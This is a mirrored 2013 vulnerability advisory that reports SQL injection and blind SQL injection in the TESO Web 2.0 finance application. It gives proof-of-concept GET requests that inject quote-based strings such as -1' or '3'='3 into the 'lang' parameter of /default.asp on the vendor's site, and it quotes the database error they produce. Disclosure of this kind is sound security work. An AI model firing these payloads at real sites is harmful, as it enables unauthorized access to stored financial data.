Vulners
Lucene search
TESO Web 2.0 SQL Injection
🗓️ 09 Jun 2013 00:00:00Reported by Juan Carlos GarciaType 
packetstorm🔗 packetstormsecurity.com👁 41 Views
`============================================
TESO web 2.0 SQLInjection/ Blind SQLInjection
=============================================
I. VULNERABILITY
-------------------------
#Title: TESO SQLInjection/ Blind SQLInjection
#Vendor:http://www.tesoweb.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
http://blogs.0verl0ad.com
Twitter:@secnight
Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn
II. DESCRIPTION
-------------------------
TESO is a powerful, free lets you take control of your money and your portfolio, both at home and in your business.
Its main features are:
Privacy and confidentiality. TESO stores no personal information nor are they ask in the registry.
Police their keys and no one can associate with the accounts stored in TESO.
Bank Reconciliation. TESO to load bank statements to compare (reconcile) with its own accounting.
Investment Securities. TESO updates the latest quotes from more than 1000 European and American
values, evaluate your portfolio and calculates realized and unrealized capital gains. You can
manage your portfolio TESO without carrying a full accounting of your money
Established that is not safe, it is not private and are in danger of data confidentiality
III. PROOF OF CONCEPT
-------------------------
##Blind SQLInjection
Affected items
/default.asp
Attack details
URL encoded GET input lang was set to -1' or '3'='3
GET /default.asp?lang=-1%27%20or%204%20%3d%20%275 HTTP/1.1
http://www.tesoweb.es/default.asp?lang=-1%27%20or%204%20%3d%20%275
##SQLinjection
Affected items
/default.asp
Attack details
URL encoded GET input lang was set to 1'
Error message found:
<font face="Arial"
size=2>Syntax error in string in query expression '((idioma = '1'') and (activa = True))
order by fecha desc'.</font>
GET /default.asp?lang=1%27 HTTP/1.1
http://www.tesoweb.es/default.asp?lang=1%27
IV SOLUTION
------------------------
The script should filter metacharacters from user input.
It's absolutely vital to sanitize user inputs to insure
that they do not contain dangerous codes, whether to the
SQL server or to HTML itself. One's first idea is to strip
out "bad stuff", such as quotes or semicolons or escapes,
but this is a misguided attempt. Though it's easy to point
out some dangerous characters, it's harder to point to all of them.
V. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Carlos García(@secnight)
VII. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jun 2013 00:00Current
0.2Low risk
Vulners AI Score0.2